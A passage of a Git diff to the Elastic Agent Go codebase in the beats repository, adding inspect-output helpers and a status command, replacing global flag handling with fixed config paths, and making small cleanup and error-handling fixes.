"%v\n", err) - os.Exit(1) + if outName == "" { + return inspectOutputs(cfgPath, agentInfo) } + + return inspectOutput(cfgPath, outName, program, agentInfo) }, } @@ -67,3 +81,260 @@ func newInspectOutputCommandWithArgs(flags *globalFlags, _ []string, streams *cl return cmd } + +func inspectConfig(cfgPath string) error { + fullCfg, err := operations.LoadFullAgentConfig(cfgPath, true) + if err != nil { + return err + } + + return printConfig(fullCfg) +} + +func printMapStringConfig(mapStr map[string]interface{}) error { + l, err := newErrorLogger() + if err != nil { + return err + } + caps, err := capabilities.Load(paths.AgentCapabilitiesPath(), l, status.NewController(l)) + if err != nil { + return err + } + + newCfg, err := caps.Apply(mapStr) + if err != nil { + return errors.New(err, "failed to apply capabilities") + } + newMap, ok := newCfg.(map[string]interface{}) + if !ok { + return errors.New("config returned from capabilities has invalid type") + } + + data, err := yaml.Marshal(newMap) + if err != nil { + return errors.New(err, "could not marshal to YAML") + } + + fmt.Println(string(data)) + return nil +} + +func printConfig(cfg *config.Config) error { + mapStr, err := cfg.ToMapStr() + if err != nil { + return err + } + + return printMapStringConfig(mapStr) +} + +func newErrorLogger() (*logger.Logger, error) { + return logger.NewWithLogpLevel("", logp.ErrorLevel, false) +} + +func inspectOutputs(cfgPath string, agentInfo *info.AgentInfo) error { + l, err := newErrorLogger() + if err != nil { + return err + } + + fullCfg, err := operations.LoadFullAgentConfig(cfgPath, true) + if err != nil { + return err + } + + fleetConfig, err := fullCfg.ToMapStr() + if err != nil { + return err + } + + isStandalone, err := isStandalone(fullCfg) + if err != nil { + return err + } + + return listOutputsFromMap(l, agentInfo, fleetConfig, isStandalone) +} + +func listOutputsFromConfig(log *logger.Logger, agentInfo *info.AgentInfo, cfg *config.Config, isStandalone bool) error { + programsGroup, err := getProgramsFromConfig(log, agentInfo, cfg, isStandalone) + if err != nil { + return err + + } + + for k := range programsGroup { + fmt.Println(k) + } + + return nil +} + +func listOutputsFromMap(log *logger.Logger, agentInfo *info.AgentInfo, cfg map[string]interface{}, isStandalone bool) error { + c, err := config.NewConfigFrom(cfg) + if err != nil { + return err + } + + return listOutputsFromConfig(log, agentInfo, c, isStandalone) +} + +func inspectOutput(cfgPath, output, program string, agentInfo *info.AgentInfo) error { + l, err := newErrorLogger() + if err != nil { + return err + } + + fullCfg, err := operations.LoadFullAgentConfig(cfgPath, true) + if err != nil { + return err + } + + fleetConfig, err := fullCfg.ToMapStr() + if err != nil { + return err + } + + return printOutputFromMap(l, agentInfo, output, program, fleetConfig, true) +} + +func printOutputFromConfig(log *logger.Logger, agentInfo *info.AgentInfo, output, programName string, cfg *config.Config, isStandalone bool) error { + programsGroup, err := getProgramsFromConfig(log, agentInfo, cfg, isStandalone) + if err != nil { + return err + + } + + for k, programs := range programsGroup { + if k != output { + continue + } + + var programFound bool + for _, p := range programs { + if programName != "" && programName != p.Spec.Cmd { + continue + } + + programFound = true + fmt.Printf("[%s] %s:\n", k, p.Spec.Cmd) + printMapStringConfig(p.Configuration()) + fmt.Println("---") + } + + if !programFound { + return fmt.Errorf("program '%s' is not recognized within output '%s', try running `elastic-agent inspect output` to find available outputs", + programName, + output) + } + + return nil + } + + return fmt.Errorf("output '%s' is not recognized, try running `elastic-agent inspect output` to find available outputs", output) + +} + +func printOutputFromMap(log *logger.Logger, agentInfo *info.AgentInfo, output, programName string, cfg map[string]interface{}, isStandalone bool) error { + c, err := config.NewConfigFrom(cfg) + if err != nil { + return err + } + + return printOutputFromConfig(log, agentInfo, output, programName, c, isStandalone) +} + +func getProgramsFromConfig(log *logger.Logger, agentInfo *info.AgentInfo, cfg *config.Config, isStandalone bool) (map[string][]program.Program, error) { + monitor := noop.NewMonitor() + router := &inmemRouter{} + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + composableCtrl, err := composable.New(log, cfg) + if err != nil { + return nil, err + } + composableWaiter := newWaitForCompose(composableCtrl) + configModifiers := &pipeline.ConfigModifiers{ + Decorators: []pipeline.DecoratorFunc{modifiers.InjectMonitoring}, + Filters: []pipeline.FilterFunc{filters.StreamChecker}, + } + + if !isStandalone { + sysInfo, err := sysinfo.Host() + if err != nil { + return nil, errors.New(err, + "fail to get system information", + errors.TypeUnexpected) + } + configModifiers.Filters = append(configModifiers.Filters, modifiers.InjectFleet(cfg, sysInfo.Info(), agentInfo)) + } + + caps, err := capabilities.Load(paths.AgentCapabilitiesPath(), log, status.NewController(log)) + if err != nil { + return nil, err + } + + emit, err := emitter.New( + ctx, + log, + agentInfo, + composableWaiter, + router, + configModifiers, + caps, + monitor, + ) + if err != nil { + return nil, err + } + + if err := emit(cfg); err != nil { + return nil, err + } + composableWaiter.Wait() + return router.programs, nil +} + +type inmemRouter struct { + programs map[string][]program.Program +} + +func (r *inmemRouter) Route(id string, grpProg map[pipeline.RoutingKey][]program.Program) error { + r.programs = grpProg + return nil +} + +func (r *inmemRouter) Shutdown() {} + +type waitForCompose struct { + controller composable.Controller + done chan bool +} + +func newWaitForCompose(wrapped composable.Controller) *waitForCompose { + return &waitForCompose{ + controller: wrapped, + done: make(chan bool), + } +} + +func (w *waitForCompose) Run(ctx context.Context, cb composable.VarsCallback) error { + err := w.controller.Run(ctx, func(vars []*transpiler.Vars) { + cb(vars) + w.done <- true + }) + return err +} + +func (w *waitForCompose) Wait() { + <-w.done +} + +func isStandalone(cfg *config.Config) (bool, error) { + c, err := configuration.NewFromConfig(cfg) + if err != nil { + return false, err + } + + return configuration.IsStandalone(c.Fleet), nil +} diff --git a/x-pack/elastic-agent/pkg/agent/cmd/install.go b/x-pack/elastic-agent/pkg/agent/cmd/install.go index 09a44bc67c4..090f6a9f2fe 100644 --- a/x-pack/elastic-agent/pkg/agent/cmd/install.go +++ b/x-pack/elastic-agent/pkg/agent/cmd/install.go @@ -19,7 +19,7 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/cli" ) -func newInstallCommandWithArgs(flags *globalFlags, _ []string, streams *cli.IOStreams) *cobra.Command { +func newInstallCommandWithArgs(_ []string, streams *cli.IOStreams) *cobra.Command { cmd := &cobra.Command{ Use: "install", Short: "Install Elastic Agent permanently on this system", @@ -29,7 +29,7 @@ Unless all the require command-line parameters are provided or -f is used this c would like the Agent to operate. `, Run: func(c *cobra.Command, args []string) { - if err := installCmd(streams, c, flags, args); err != nil { + if err := installCmd(streams, c, args); err != nil { fmt.Fprintf(streams.Err, "Error: %v\n", err) os.Exit(1) } @@ -42,7 +42,7 @@ would like the Agent to operate. return cmd } -func installCmd(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, args []string) error { +func installCmd(streams *cli.IOStreams, cmd *cobra.Command, args []string) error { isAdmin, err := install.HasRoot() if err != nil { return fmt.Errorf("unable to perform install command while checking for administrator rights, %v", err) @@ -57,7 +57,7 @@ func installCmd(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, } // check the lock to ensure that elastic-agent is not already running in this directory - locker := filelock.NewAppLocker(paths.Data(), agentLockFileName) + locker := filelock.NewAppLocker(paths.Data(), paths.AgentLockFileName) if err := locker.TryLock(); err != nil { if err == filelock.ErrAppAlreadyRunning { return fmt.Errorf("cannot perform installation as Elastic Agent is already running from this directory") @@ -141,7 +141,7 @@ func installCmd(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, } } } - cfgFile := flags.Config() + cfgFile := paths.ConfigFile() err = install.Install(cfgFile) if err != nil { return err diff --git a/x-pack/elastic-agent/pkg/agent/cmd/reexec.go b/x-pack/elastic-agent/pkg/agent/cmd/reexec.go index 575828212a2..2ac2425b931 100644 --- a/x-pack/elastic-agent/pkg/agent/cmd/reexec.go +++ b/x-pack/elastic-agent/pkg/agent/cmd/reexec.go @@ -12,6 +12,6 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/cli" ) -func newReExecWindowsCommand(flags *globalFlags, _ []string, streams *cli.IOStreams) *cobra.Command { +func newReExecWindowsCommand(_ []string, streams *cli.IOStreams) *cobra.Command { return nil } diff --git a/x-pack/elastic-agent/pkg/agent/cmd/reexec_windows.go b/x-pack/elastic-agent/pkg/agent/cmd/reexec_windows.go index b47678801fc..68c98c0534f 100644 --- a/x-pack/elastic-agent/pkg/agent/cmd/reexec_windows.go +++ b/x-pack/elastic-agent/pkg/agent/cmd/reexec_windows.go @@ -20,7 +20,7 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/cli" ) -func newReExecWindowsCommand(flags *globalFlags, _ []string, streams *cli.IOStreams) *cobra.Command { +func newReExecWindowsCommand(_ []string, streams *cli.IOStreams) *cobra.Command { cmd := &cobra.Command{ Hidden: true, Use: "reexec_windows ", diff --git a/x-pack/elastic-agent/pkg/agent/cmd/run.go b/x-pack/elastic-agent/pkg/agent/cmd/run.go index cfc2a2898b3..e4d5b1c105c 100644 --- a/x-pack/elastic-agent/pkg/agent/cmd/run.go +++ b/x-pack/elastic-agent/pkg/agent/cmd/run.go @@ -46,12 +46,14 @@ const ( agentName = "elastic-agent" ) -func newRunCommandWithArgs(flags *globalFlags, _ []string, streams *cli.IOStreams) *cobra.Command { +type cfgOverrider func(cfg *configuration.Configuration) + +func newRunCommandWithArgs(_ []string, streams *cli.IOStreams) *cobra.Command { return &cobra.Command{ Use: "run", Short: "Start the elastic-agent.", Run: func(_ *cobra.Command, _ []string) { - if err := run(flags, streams); err != nil { + if err := run(streams, nil); err != nil { fmt.Fprintf(streams.Err, "%v\n", err) os.Exit(1) } @@ -59,12 +61,12 @@ func newRunCommandWithArgs(flags *globalFlags, _ []string, streams *cli.IOStream } } -func run(flags *globalFlags, streams *cli.IOStreams) error { // Windows: Mark service as stopped. +func run(streams *cli.IOStreams, override cfgOverrider) error { // Windows: Mark service as stopped. // After this is run, the service is considered by the OS to be stopped. // This must be the first deferred cleanup task (last to execute). defer service.NotifyTermination() - locker := filelock.NewAppLocker(paths.Data(), agentLockFileName) + locker := filelock.NewAppLocker(paths.Data(), paths.AgentLockFileName) if err := locker.TryLock(); err != nil { return err } @@ -81,7 +83,7 @@ func run(flags *globalFlags, streams *cli.IOStreams) error { // Windows: Mark se } service.HandleSignals(stopBeat, cancel) - pathConfigFile := flags.Config() + pathConfigFile := paths.ConfigFile() rawConfig, err := config.LoadFile(pathConfigFile) if err != nil { return errors.New(err, @@ -102,6 +104,10 @@ func run(flags *globalFlags, streams *cli.IOStreams) error { // Windows: Mark se errors.M(errors.MetaKeyPath, pathConfigFile)) } + if override != nil { + override(cfg) + } + agentInfo, err := info.NewAgentInfoWithLog(defaultLogLevel(cfg)) if err != nil { return errors.New(err, @@ -110,7 +116,7 @@ func run(flags *globalFlags, streams *cli.IOStreams) error { // Windows: Mark se errors.M(errors.MetaKeyPath, pathConfigFile)) } - logger, err := logger.NewFromConfig("", cfg.Settings.LoggingConfig) + logger, err := logger.NewFromConfig("", cfg.Settings.LoggingConfig, true) if err != nil { return err } @@ -329,7 +335,7 @@ func exposeMetricsEndpoint(log *logger.Logger, config *common.Config, ns func(st } else { content = string(bytes) } - fmt.Fprintf(w, content) + fmt.Fprint(w, content) } } diff --git a/x-pack/elastic-agent/pkg/agent/cmd/status.go b/x-pack/elastic-agent/pkg/agent/cmd/status.go new file mode 100644 index 00000000000..d076c91ee41 --- /dev/null +++ b/x-pack/elastic-agent/pkg/agent/cmd/status.go @@ -0,0 +1,122 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package cmd + +import ( + "context" + "encoding/json" + "fmt" + "io" + "os" + "time" + + "gopkg.in/yaml.v2" + + "github.com/spf13/cobra" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/control/client" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/cli" +) + +type outputter func(io.Writer, *client.AgentStatus) error + +var outputs = map[string]outputter{ + "human": humanOutput, + "json": jsonOutput, + "yaml": yamlOutput, +} + +func newStatusCommand(_ []string, streams *cli.IOStreams) *cobra.Command { + cmd := &cobra.Command{ + Use: "status", + Short: "Status returns the current status of the running Elastic Agent daemon.", + Long: `Status returns the current status of the running Elastic Agent daemon.`, + Run: func(c *cobra.Command, args []string) { + if err := statusCmd(streams, c, args); err != nil { + fmt.Fprintf(streams.Err, "Error: %v\n", err) + os.Exit(1) + } + }, + } + + cmd.Flags().String("output", "human", "Output the status information in either human, json, or yaml (default: human)") + + return cmd +} + +func statusCmd(streams *cli.IOStreams, cmd *cobra.Command, args []string) error { + output, _ := cmd.Flags().GetString("output") + outputFunc, ok := outputs[output] + if !ok { + return fmt.Errorf("unsupported output: %s", output) + } + + ctx := handleSignal(context.Background()) + innerCtx, cancel := context.WithTimeout(ctx, 30*time.Second) + defer cancel() + + status, err := getDaemonStatus(innerCtx) + if err == context.DeadlineExceeded { + return errors.New("timed out after 30 seconds trying to connect to Elastic Agent daemon") + } else if err == context.Canceled { + return nil + } else if err != nil { + return fmt.Errorf("failed to communicate with Elastic Agent daemon: %s", err) + } + + err = outputFunc(streams.Out, status) + if err != nil { + return err + } + // exit 0 only if the Elastic Agent daemon is healthy + if status.Status == client.Healthy { + os.Exit(0) + } else { + os.Exit(1) + } + return nil +} + +func humanOutput(w io.Writer, status *client.AgentStatus) error { + fmt.Fprintf(w, "Status: %s\n", status.Status) + if status.Message == "" { + fmt.Fprint(w, "Message: (no message)\n") + } else { + fmt.Fprintf(w, "Message: %s\n", status.Message) + } + if len(status.Applications) == 0 { + fmt.Fprint(w, "Applications: (none)\n") + } else { + fmt.Fprint(w, "Applications:\n") + for _, app := range status.Applications { + fmt.Fprintf(w, " * %s\t(%s)\n", app.Name, app.Status) + if app.Message == "" { + fmt.Fprint(w, " (no message)\n") + } else { + fmt.Fprintf(w, " %s\n", app.Message) + } + } + } + return nil +} + +func jsonOutput(w io.Writer, status *client.AgentStatus) error { + bytes, err := json.MarshalIndent(status, "", " ") + if err != nil { + return err + } + fmt.Fprintf(w, "%s\n", bytes) + return nil +} + +func yamlOutput(w io.Writer, status *client.AgentStatus) error { + bytes, err := yaml.Marshal(status) + if err != nil { + return err + } + fmt.Fprintf(w, "%s\n", bytes) + return nil +} diff --git a/x-pack/elastic-agent/pkg/agent/cmd/uninstall.go b/x-pack/elastic-agent/pkg/agent/cmd/uninstall.go index f21f157a2d3..b6757ee464c 100644 --- a/x-pack/elastic-agent/pkg/agent/cmd/uninstall.go +++ b/x-pack/elastic-agent/pkg/agent/cmd/uninstall.go @@ -17,7 +17,7 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/cli" ) -func newUninstallCommandWithArgs(flags *globalFlags, _ []string, streams *cli.IOStreams) *cobra.Command { +func newUninstallCommandWithArgs(_ []string, streams *cli.IOStreams) *cobra.Command { cmd := &cobra.Command{ Use: "uninstall", Short: "Uninstall permanent Elastic Agent from this system", @@ -26,7 +26,7 @@ func newUninstallCommandWithArgs(flags *globalFlags, _ []string, streams *cli.IO Unless -f is used this command will ask confirmation before performing removal. `, Run: func(c *cobra.Command, args []string) { - if err := uninstallCmd(streams, c, flags, args); err != nil { + if err := uninstallCmd(streams, c, args); err != nil { fmt.Fprintf(streams.Err, "Error: %v\n", err) os.Exit(1) } @@ -38,7 +38,7 @@ Unless -f is used this command will ask confirmation before performing removal. return cmd } -func uninstallCmd(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, args []string) error { +func uninstallCmd(streams *cli.IOStreams, cmd *cobra.Command, args []string) error { isAdmin, err := install.HasRoot() if err != nil { return fmt.Errorf("unable to perform command while checking for administrator rights, %v", err) @@ -78,7 +78,7 @@ func uninstallCmd(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags } } - err = install.Uninstall(flags.Config()) + err = install.Uninstall(paths.ConfigFile()) if err != nil { return err } diff --git a/x-pack/elastic-agent/pkg/agent/cmd/upgrade.go b/x-pack/elastic-agent/pkg/agent/cmd/upgrade.go index 81a5c82b4ab..d3c8dc27e6c 100644 --- a/x-pack/elastic-agent/pkg/agent/cmd/upgrade.go +++ b/x-pack/elastic-agent/pkg/agent/cmd/upgrade.go @@ -17,13 +17,13 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/cli" ) -func newUpgradeCommandWithArgs(flags *globalFlags, _ []string, streams *cli.IOStreams) *cobra.Command { +func newUpgradeCommandWithArgs(_ []string, streams *cli.IOStreams) *cobra.Command { cmd := &cobra.Command{ Use: "upgrade ", Short: "Upgrade the currently running Elastic Agent to the specified version", Args: cobra.ExactArgs(1), Run: func(c *cobra.Command, args []string) { - if err := upgradeCmd(streams, c, flags, args); err != nil { + if err := upgradeCmd(streams, c, args); err != nil { fmt.Fprintf(streams.Err, "%v\n", err) os.Exit(1) } @@ -35,7 +35,7 @@ func newUpgradeCommandWithArgs(flags *globalFlags, _ []string, streams *cli.IOSt return cmd } -func upgradeCmd(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, args []string) error { +func upgradeCmd(streams *cli.IOStreams, cmd *cobra.Command, args []string) error { fmt.Fprintln(streams.Out, "The upgrade process of Elastic Agent is currently EXPERIMENTAL and should not be used in production") version := args[0] diff --git a/x-pack/elastic-agent/pkg/agent/cmd/watch.go b/x-pack/elastic-agent/pkg/agent/cmd/watch.go index d7707053dc3..c8a51d33413 100644 --- a/x-pack/elastic-agent/pkg/agent/cmd/watch.go +++ b/x-pack/elastic-agent/pkg/agent/cmd/watch.go @@ -34,13 +34,13 @@ const ( watcherLockFile = "watcher.lock" ) -func newWatchCommandWithArgs(flags *globalFlags, _ []string, streams *cli.IOStreams) *cobra.Command { +func newWatchCommandWithArgs(_ []string, streams *cli.IOStreams) *cobra.Command { cmd := &cobra.Command{ Use: "watch", Short: "Watch watches Elastic Agent for failures and initiates rollback.", Long: `Watch watches Elastic Agent for failures and initiates rollback.`, Run: func(c *cobra.Command, args []string) { - if err := watchCmd(streams, c, flags, args); err != nil { + if err := watchCmd(streams, c, args); err != nil { fmt.Fprintf(streams.Err, "Error: %v\n", err) os.Exit(1) } @@ -50,8 +50,8 @@ func newWatchCommandWithArgs(flags *globalFlags, _ []string, streams *cli.IOStre return cmd } -func watchCmd(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, args []string) error { - log, err := configuredLogger(flags) +func watchCmd(streams *cli.IOStreams, cmd *cobra.Command, args []string) error { + log, err := configuredLogger() if err != nil { return err } @@ -81,7 +81,7 @@ func watchCmd(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, ar isWithinGrace, tilGrace := gracePeriod(marker) if !isWithinGrace { - log.Debugf("not within grace [updatedOn %v] %v", marker.UpdatedOn.String(), time.Now().Sub(marker.UpdatedOn).String()) + log.Debugf("not within grace [updatedOn %v] %v", marker.UpdatedOn.String(), time.Since(marker.UpdatedOn).String()) // if it is started outside of upgrade loop // if we're not within grace and marker is still there it might mean // that cleanup was not performed ok, cleanup everything except current version @@ -172,7 +172,7 @@ WATCHLOOP: // gracePeriod returns true if it is within grace period and time until grace period ends. // otherwise it returns false and 0 func gracePeriod(marker *upgrade.UpdateMarker) (bool, time.Duration) { - sinceUpdate := time.Now().Sub(marker.UpdatedOn) + sinceUpdate := time.Since(marker.UpdatedOn) if 0 < sinceUpdate && sinceUpdate < gracePeriodDuration { return true, gracePeriodDuration - sinceUpdate @@ -181,8 +181,8 @@ func gracePeriod(marker *upgrade.UpdateMarker) (bool, time.Duration) { return false, gracePeriodDuration } -func configuredLogger(flags *globalFlags) (*logger.Logger, error) { - pathConfigFile := flags.Config() +func configuredLogger() (*logger.Logger, error) { + pathConfigFile := paths.ConfigFile() rawConfig, err := config.LoadFile(pathConfigFile) if err != nil { return nil, errors.New(err, @@ -201,7 +201,7 @@ func configuredLogger(flags *globalFlags) (*logger.Logger, error) { cfg.Settings.LoggingConfig.Beat = watcherName - logger, err := logger.NewFromConfig("", cfg.Settings.LoggingConfig) + logger, err := logger.NewFromConfig("", cfg.Settings.LoggingConfig, false) if err != nil { return nil, err } diff --git a/x-pack/elastic-agent/pkg/agent/control/addr.go b/x-pack/elastic-agent/pkg/agent/control/addr.go index 116f9d8dd95..fabaf483140 100644 --- a/x-pack/elastic-agent/pkg/agent/control/addr.go +++ b/x-pack/elastic-agent/pkg/agent/control/addr.go @@ -9,6 +9,7 @@ package control import ( "crypto/sha256" "fmt" + "path/filepath" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/info" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/paths" @@ -21,9 +22,12 @@ func Address() string { return paths.SocketPath } - // not install, adjust the path based on data path - data := paths.Data() - // entire string cannot be longer than 107 characters, this forces the - // length to always be 88 characters (but unique per data path) - return fmt.Sprintf(`unix:///tmp/elastic-agent-%x.sock`, sha256.Sum256([]byte(data))) + // unix socket path must be less than 104 characters + path := fmt.Sprintf("unix://%s.sock", filepath.Join(paths.TempDir(), "elastic-agent-control")) + if len(path) < 104 { + return path + } + // place in global /tmp to ensure that its small enough to fit; current path is way to long + // for it to be used, but needs to be unique per Agent (in the case that multiple are running) + return fmt.Sprintf(`unix:///tmp/elastic-agent-%x.sock`, sha256.Sum256([]byte(path))) } diff --git a/x-pack/elastic-agent/pkg/agent/control/client/client.go b/x-pack/elastic-agent/pkg/agent/control/client/client.go index 5e55fce9349..3709a834a77 100644 --- a/x-pack/elastic-agent/pkg/agent/control/client/client.go +++ b/x-pack/elastic-agent/pkg/agent/control/client/client.go @@ -78,12 +78,10 @@ type Client interface { // client manages the state and communication to the Elastic Agent. type client struct { - ctx context.Context - cancel context.CancelFunc - wg sync.WaitGroup - client proto.ElasticAgentControlClient - cfgLock sync.RWMutex - obsLock sync.RWMutex + ctx context.Context + cancel context.CancelFunc + wg sync.WaitGroup + client proto.ElasticAgentControlClient } // New creates a client connection to Elastic Agent. diff --git a/x-pack/elastic-agent/pkg/agent/control/control_test.go b/x-pack/elastic-agent/pkg/agent/control/control_test.go index bcda4a0e4ed..b37a161047f 100644 --- a/x-pack/elastic-agent/pkg/agent/control/control_test.go +++ b/x-pack/elastic-agent/pkg/agent/control/control_test.go @@ -72,7 +72,7 @@ func newErrorLogger(t *testing.T) *logger.Logger { loggerCfg := logger.DefaultLoggingConfig() loggerCfg.Level = logp.ErrorLevel - log, err := logger.NewFromConfig("", loggerCfg) + log, err := logger.NewFromConfig("", loggerCfg, false) require.NoError(t, err) return log } diff --git a/x-pack/elastic-agent/pkg/agent/install/uninstall.go b/x-pack/elastic-agent/pkg/agent/install/uninstall.go index 4601585416e..6a60a2c9258 100644 --- a/x-pack/elastic-agent/pkg/agent/install/uninstall.go +++ b/x-pack/elastic-agent/pkg/agent/install/uninstall.go @@ -34,6 +34,11 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/release" ) +const ( + inputsKey = "inputs" + outputsKey = "outputs" +) + // Uninstall uninstalls persistently Elastic Agent on the system. func Uninstall(cfgFile string) error { // uninstall the current service @@ -119,12 +124,12 @@ func delayedRemoval(path string) { } func uninstallPrograms(ctx context.Context, cfgFile string) error { - log, err := logger.NewWithLogpLevel("", logp.ErrorLevel) + log, err := logger.NewWithLogpLevel("", logp.ErrorLevel, false) if err != nil { return err } - cfg, err := operations.LoadFullAgentConfig(cfgFile) + cfg, err := operations.LoadFullAgentConfig(cfgFile, false) if err != nil { return err } @@ -139,6 +144,11 @@ func uninstallPrograms(ctx context.Context, cfgFile string) error { return err } + // nothing to remove + if len(pp) == 0 { + return nil + } + uninstaller, err := uninstall.NewUninstaller() if err != nil { return err @@ -165,6 +175,17 @@ func programsFromConfig(cfg *config.Config) ([]program.Program, error) { if err != nil { return nil, errors.New("failed to create a map from config", err) } + + // if no input is defined nothing to remove + if _, found := mm[inputsKey]; !found { + return nil, nil + } + + // if no output is defined nothing to remove + if _, found := mm[outputsKey]; !found { + return nil, nil + } + ast, err := transpiler.NewAST(mm) if err != nil { return nil, errors.New("failed to create a ast from config", err) @@ -176,6 +197,9 @@ func programsFromConfig(cfg *config.Config) ([]program.Program, error) { } ppMap, err := program.Programs(agentInfo, ast) + if err != nil { + return nil, errors.New("failed to get programs from config", err) + } var pp []program.Program check := make(map[string]bool) @@ -196,6 +220,10 @@ func programsFromConfig(cfg *config.Config) ([]program.Program, error) { func applyDynamics(ctx context.Context, log *logger.Logger, cfg *config.Config) (*config.Config, error) { cfgMap, err := cfg.ToMapStr() + if err != nil { + return nil, err + } + ast, err := transpiler.NewAST(cfgMap) if err != nil { return nil, err @@ -204,7 +232,7 @@ func applyDynamics(ctx context.Context, log *logger.Logger, cfg *config.Config) // apply dynamic inputs inputs, ok := transpiler.Lookup(ast, "inputs") if ok { - varsArray := make([]*transpiler.Vars, 0, 0) + varsArray := make([]*transpiler.Vars, 0) var wg sync.WaitGroup wg.Add(1) varsCallback := func(vv []*transpiler.Vars) { @@ -246,5 +274,9 @@ func applyDynamics(ctx context.Context, log *logger.Logger, cfg *config.Config) } finalConfig, err := newAst.Map() + if err != nil { + return nil, err + } + return config.NewConfigFrom(finalConfig) } diff --git a/x-pack/elastic-agent/pkg/agent/operation/common_test.go b/x-pack/elastic-agent/pkg/agent/operation/common_test.go index 2ec6b531456..4eb24a105d3 100644 --- a/x-pack/elastic-agent/pkg/agent/operation/common_test.go +++ b/x-pack/elastic-agent/pkg/agent/operation/common_test.go @@ -92,7 +92,7 @@ func getTestOperator(t *testing.T, downloadPath string, installPath string, p *a func getLogger() *logger.Logger { loggerCfg := logger.DefaultLoggingConfig() loggerCfg.Level = logp.ErrorLevel - l, _ := logger.NewFromConfig("", loggerCfg) + l, _ := logger.NewFromConfig("", loggerCfg, false) return l } @@ -129,7 +129,7 @@ func waitFor(t *testing.T, check func() error) { if err == nil { return } - if time.Now().Sub(started) >= 15*time.Second { + if time.Since(started) >= 15*time.Second { t.Fatalf("check timed out after 15 second: %s", err) } time.Sleep(10 * time.Millisecond) diff --git a/x-pack/elastic-agent/pkg/agent/operation/operation_remove.go b/x-pack/elastic-agent/pkg/agent/operation/operation_remove.go deleted file mode 100644 index f2254293446..00000000000 --- a/x-pack/elastic-agent/pkg/agent/operation/operation_remove.go +++ /dev/null @@ -1,42 +0,0 @@ -// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one -// or more contributor license agreements. Licensed under the Elastic License; -// you may not use this file except in compliance with the Elastic License. - -package operation - -import ( - "context" - - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/state" -) - -// operationRemove uninstall and removes all the bits related to the artifact -type operationRemove struct { -} - -func newOperationRemove() *operationRemove { - return &operationRemove{} -} - -// Name is human readable name identifying an operation -func (o *operationRemove) Name() string { - return "operation-remove" -} - -// Check checks whether remove needs to run. -// -// Always returns false. -func (o *operationRemove) Check(_ context.Context, _ Application) (bool, error) { - return false, nil -} - -// Run runs the operation -func (o *operationRemove) Run(ctx context.Context, application Application) (err error) { - defer func() { - if err != nil { - application.SetState(state.Failed, err.Error(), nil) - } - }() - - return nil -} diff --git a/x-pack/elastic-agent/pkg/agent/operation/operator.go b/x-pack/elastic-agent/pkg/agent/operation/operator.go index a0416545b11..35b9a6731b1 100644 --- a/x-pack/elastic-agent/pkg/agent/operation/operator.go +++ b/x-pack/elastic-agent/pkg/agent/operation/operator.go @@ -152,7 +152,7 @@ func (o *Operator) HandleConfig(cfg configrequest.Request) error { o.statusController.UpdateStateID(stateID) for _, step := range steps { - if strings.ToLower(step.ProgramSpec.Cmd) != strings.ToLower(monitoringName) { + if !strings.EqualFold(step.ProgramSpec.Cmd, monitoringName) { if _, isSupported := program.SupportedMap[strings.ToLower(step.ProgramSpec.Cmd)]; !isSupported { // mark failed, new config cannot be run msg := fmt.Sprintf("program '%s' is not supported", step.ProgramSpec.Cmd) @@ -344,8 +344,3 @@ func (o *Operator) deleteApp(p Descriptor) { o.logger.Debugf("operator is removing %s from app collection: %v", p.ID(), o.apps) delete(o.apps, id) } - -func isMonitorable(descriptor Descriptor) bool { - isSidecar := app.IsSidecar(descriptor) - return !isSidecar // everything is monitorable except sidecar -} diff --git a/x-pack/elastic-agent/pkg/agent/program/spec.go b/x-pack/elastic-agent/pkg/agent/program/spec.go index f7d81b74a7e..98e539d2007 100644 --- a/x-pack/elastic-agent/pkg/agent/program/spec.go +++ b/x-pack/elastic-agent/pkg/agent/program/spec.go @@ -32,6 +32,7 @@ type Spec struct { Cmd string `yaml:"cmd"` Args []string `yaml:"args"` Artifact string `yaml:"artifact"` + ActionInputTypes []string `yaml:"action_input_types,omitempty"` LogPaths map[string]string `yaml:"log_paths,omitempty"` MetricEndpoints map[string]string `yaml:"metric_endpoints,omitempty"` Rules *transpiler.RuleList `yaml:"rules"` diff --git a/x-pack/elastic-agent/pkg/agent/program/supported.go b/x-pack/elastic-agent/pkg/agent/program/supported.go index f584060e1d3..26e4368897e 100644 --- a/x-pack/elastic-agent/pkg/agent/program/supported.go +++ b/x-pack/elastic-agent/pkg/agent/program/supported.go @@ -23,8 +23,9 @@ func init() { // spec/fleet-server.yml // spec/heartbeat.yml // spec/metricbeat.yml + // spec/osquerybeat.yml // spec/packetbeat.yml - unpacked := 